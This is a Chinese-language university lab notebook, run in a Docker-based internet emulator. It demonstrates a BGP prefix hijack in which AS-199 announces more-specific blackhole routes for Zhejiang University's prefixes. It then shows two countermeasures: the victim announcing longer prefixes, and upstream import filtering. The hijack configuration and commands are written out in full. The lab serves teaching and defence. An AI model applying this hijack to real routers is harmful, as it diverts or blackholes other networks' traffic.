# BGP 网络前缀劫持攻击

欢迎来到浙江大学网络安全宣传周“昨日重现”专题展 BGP 网络前缀劫持攻击部分！

在互联网的庞大体系中，BGP（边界网关协议）作为核心路由协议，原生并没有对 IP 前缀归属进行验证，这使得任何自治系统（AS）都有可能通过 BGP 路由器，向全球宣告并传播并不属于自己的 IP 地址前缀。这类“虚假前缀”一旦被其他网络接收，往往因 BGP “最长前缀优先”的选路原则，导致原本流向正确目的地的网络流量部分甚至全部被错误引导至攻击者掌控的网络，从而发生数据截获、篡改甚至服务中断的风险，这种现象就是我们所说的 BGP 前缀劫持攻击。

在本实验中，你将亲身体验一次 BGP 前缀劫持攻击的全过程，深入理解其原理与危害，并学习如何应对这类安全威胁。请随我们一同踏入互联网路由安全的边界，用行动守护我们的网络世界！

## 设置环境

在这个实验中，我们用 AS-199 来劫持浙江大学官网的 IP 前缀（`58.205.0.0/16`、`222.192.0.0/16`、`10.203.0.0/16` 和 `118.228.0.0/16`）。为了帮助观察 BGP 劫持的效果，我们先从一台虚拟机上访问 ZJU 网络。在 Internet Map 上我们应该可以看到数据包的流动（在 Filter 栏填入 `tcp and net 58.205.0.0/16 or net 222.192.0.0/16 or net 10.203.0.0/16 or net 118.228.0.0/16`，加回车）：

- 如若展示效果不佳，可以在虚拟机上手动运行 `ping www.zju.edu.cn`，并在 Filter 栏填入 `icmp or tcp and net 58.205.0.0/16 or net 222.192.0.0/16 or net 10.203.0.0/16 or net 118.228.0.0/16`，加回车

## 1. 劫持 ZJU 网络

第一步：在本实验中，攻击者是 AS-199， 所以我们先获取 AS-199 的 BGP 配置文件，对其进行修改。可以通过下面的命令从仿真器里获得配置文件。

In [ ]:
!docker cp as199brd-attacker-bgp-10.199.0.254:/etc/bird/bird.conf ./as199_bird.conf

第二步：我们将下面的配置内容加到 AS-199 的 BGP 配置文件的最后。这些配置对 `58.205.0.0/16`、`222.192.0.0/16`、`10.203.0.0/16` 和 `118.228.0.0/16` 网络进行了劫持

```
##############################################
# Added BGP Attack
# Hijack ZJU's network prefix 58.205.0.0/16 or 222.192.0.0/16 or 10.203.0.0/16 or 118.228.0.0/16
##############################################

protocol static {
  ipv4 { table t_bgp;  };
  route 58.205.0.0/17 blackhole   {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 58.205.128.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 222.192.0.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 222.192.128.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 10.203.0.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 10.203.128.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  }
  route 118.228.0.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  }
  route 118.228.128.0/17 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  }
}
```

第三步：完成了上面的修改后将改过后的 BGP 配置文件拷贝回 AS-199，然后重启 AS-199 的 BGP 守护进程。我们把修改过的配置文件放在了 `as199brd_bird.conf_malicious` 中，你只需要运行下面的命令即可发起攻击。

In [ ]:
%%bash
docker cp  as199_bird.conf_malicious as199brd-attacker-bgp-10.199.0.254:/etc/bird/bird.conf
docker exec as199brd-attacker-bgp-10.199.0.254 birdc configure

第四步：从 Internet Map 上我们可以看到数据包的流向改变了，流向了 AS-199。现在在任何一台机器访问 ZJU 网络都会发现没有回复。我们可以去看一下 `as3brd-r103-10.103.0.3` 上的路由（这是一个 transit 自治系统），我们可以看到真实路由器所属的 AS88888 的网络有 3 个记录，其中 `58.205.0.0/17` 和 `58.205.128.0/17` 完全覆盖了 `58.205.0.0/16`（或者是 `222.192.0.0/17` 和 `222.192.128.0/17` 完全覆盖了 `222.192.0.0/16`）。从记录可以看出，去往前两个地址的下一跳路由（`10.3.0.254`）和去往 `58.205.0.0/16`（或者 `222.192.0.0/16`）的下一跳路由（`10.3.1.253`）是不一样的，这说明去往 ZJU 网络的包改道了。

In [ ]:
!docker exec as3brd-r103-10.103.0.3 ip route | grep -E '58\.205|222\.192|10\.203|118\.228'

## 2. 浙江大学的反击

第一步：浙江大学可以用同样的方法，宣称更长的前缀，将自己的网络劫持回来。只要在真实路由器的 BGP 配置文件中将配置改动即可，然后重启 BGP 守护进程。

```
#########################################
# Original BGP configuration
#########################################

# protocol static real_world {
#     ipv4 { table t_rw; import all; };
#     route 58.205.0.0/16 via 192.168.66.1;
#     route 222.192.0.0/16 via 192.168.66.1;
#     route 10.203.0.0/16 via 192.168.66.1;
#     route 118.228.0.0/16 via 192.168.66.1;
# }

#########################################
# Fight Back
#########################################

protocol static real_world {
    ipv4 { table t_rw; import all; };
    route 58.205.0.0/18 via 192.168.66.1;
    route 58.205.64.0/18 via 192.168.66.1;
    route 58.205.128.0/18 via 192.168.66.1;
    route 58.205.192.0/18 via 192.168.66.1;
    route 222.192.0.0/18 via 192.168.66.1;
    route 222.192.64.0/18 via 192.168.66.1;
    route 222.192.128.0/18 via 192.168.66.1;
    route 222.192.192.0/18 via 192.168.66.1;
    route 10.203.0.0/18 via 192.168.66.1;
    route 10.203.64.0/18 via 192.168.66.1;
    route 10.203.128.0/18 via 192.168.66.1;
    route 10.203.192.0/18 via 192.168.66.1;
    route 118.228.0.0/18 via 192.168.66.1;
    route 118.228.64.0/18 via 192.168.66.1;
    route 118.228.128.0/18 via 192.168.66.1;
    route 118.228.192.0/18 via 192.168.66.1;
}
```

第二步：我们已经将修改过的配置放在了 `as88888_bird.conf_fightback` 中，只要把它拷贝回 AS-88888 的容器就可以。运行完下面的命令后，从 Internet Map 上我们可以看到数据包的流向改变了，重新流向了我们想要的真实路由器。

In [ ]:
%%bash
docker cp as88888_bird.conf_fightback as88888brd-real-world-zju-10.103.0.177:/etc/bird/bird.conf
docker exec as88888brd-real-world-zju-10.103.0.177 birdc configure

## 3. 让 AS-199 的上游服务商来解决问题

第一步：在做这个任务之前，我们先恢复 AS-153 的配置，这样攻击仍然有效，我们就可以让上游服务商来解决这个问题。

In [ ]:
%%bash
docker cp as88888_bird.conf_original as88888brd-real-world-zju-10.103.0.177:/etc/bird/bird.conf
docker exec as88888brd-real-world-zju-10.103.0.177 birdc configure

第二步：我们先来看一下 AS-199 的上游服务商是谁。下面的命令在 AS-199 的 BGP 路由器向 BGP 的守护进程 `bird` 查询信息。

In [ ]:
!docker exec as199brd-attacker-bgp-10.199.0.254 birdc show protocols

从结果我们可以看到只有一个 BGP session（第2列），也就是 `u_as11`，这是 AS-11。这个自治系统在多处有 BGP 路由器，从 Internet Map 上可以看到，AS-199 和 AS-11 是在 IX-105 进行的对待连接（peering）。我们可以找到相应的容器的名字（`as11brd-r105-10.105.0.11`）：

In [ ]:
!docker ps | grep as11

第三步：我们可以获取 `as11brd-r105-10.105.0.11` 的 BGP 配置文件，加入一行到它和 AS-199 的配置里（见下面的带注释的行）。这行判断 AS-199 对外 announce 的网络前缀是否是 `10.199.0.0/24`，如果不是的话就拒绝接受这个 BGP announcement。
```
protocol bgp c_as199 {
    ipv4 {
        table t_bgp;
        import filter {
            bgp_large_community.add(CUSTOMER_COMM);
            bgp_local_pref = 30;
            if (net != 10.199.0.0/24) then reject;  ### 阻挡伪造的 BGP announcement 
            accept;
        };
        export all;
        next hop self;
    };
    local 10.105.0.11 as 11;
    neighbor 10.105.0.199 as 199;
}
```

第四步：把修改过的 BGP 配置文件传回 `as11brd-r105-10.105.0.11`。我们修改过的文件是 `as11_r105_bird.conf_fixproblem`。运行完下面的命令，从 Internet Map 上我们可以看到数据包的流向改变了，重新流向了 AS-153。

In [ ]:
%%bash
docker cp as11_r105_bird.conf_fixproblem as11brd-r105-10.105.0.11:/etc/bird/bird.conf
docker exec as11brd-r105-10.105.0.11 birdc configure